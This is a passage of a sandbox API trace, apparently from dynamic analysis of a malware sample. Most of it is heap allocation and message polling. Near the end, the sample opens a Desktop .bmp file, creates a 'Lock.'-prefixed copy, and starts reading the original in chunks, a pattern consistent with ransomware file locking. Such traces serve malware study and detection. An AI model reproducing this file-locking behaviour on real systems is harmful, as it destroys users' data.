hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0161.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0161.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0161.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0161.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0161.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0161.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0161.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0161.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0161.315] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0161.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0161.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0161.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0161.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0161.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0161.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0161.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0161.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0161.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0161.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0161.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0161.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0161.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0161.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0161.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0161.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0161.316] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0161.316] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0161.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0161.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0161.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0161.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0161.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0161.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0161.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0161.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0161.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0161.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0161.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0161.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0161.317] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0161.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0161.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0161.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0161.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0161.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0161.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0161.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0161.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0161.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0161.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0161.317] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0161.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0161.317] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0161.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0161.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0161.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0161.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0161.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0161.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0161.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0161.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0161.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0161.318] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.318] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0161.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0161.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0161.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0161.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0161.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0161.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.318] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.319] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0161.319] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0161.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0161.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0161.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0161.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0161.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0161.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.319] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0161.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0161.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0161.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0161.319] CryptDestroyHash (hHash=0xaa56a0) returned 1 [0161.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0161.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0161.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0161.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0161.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0161.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0161.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0161.320] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0161.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0161.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0161.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0161.320] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0161.320] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.320] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.320] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0161.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0161.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0161.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0161.320] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/A4XY 5YOfDJ7NlnC.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\a4xy 5yofdj7nlnc.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0161.321] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.321] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0161.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0161.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0161.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0161.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0161.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0161.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0161.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0161.322] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0161.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0161.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0161.322] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0161.322] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0161.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0161.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0161.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0161.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0161.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0161.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0161.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0161.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0161.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0161.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0161.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0161.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0161.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0161.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0161.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.323] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0161.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0161.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0161.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0161.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24c7a50 [0161.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0161.324] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.A4XY 5YOfDJ7NlnC.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.a4xy 5yofdj7nlnc.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0161.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0161.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0161.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0161.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0161.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0161.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0161.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0161.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0161.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.327] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0161.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0161.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0161.328] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0161.328] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0161.328] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0161.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0161.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0161.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0161.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0161.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0161.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0161.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0161.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0161.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0161.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0161.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0161.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0161.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0161.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0161.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0161.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0161.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0161.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0161.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0161.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0161.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0161.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0161.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0161.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0161.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0161.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0161.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0161.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36a0020 [0161.330] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0161.330] ReadFile (in: hFile=0x1e8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0161.336] ReadFile (in: hFile=0x1e8, 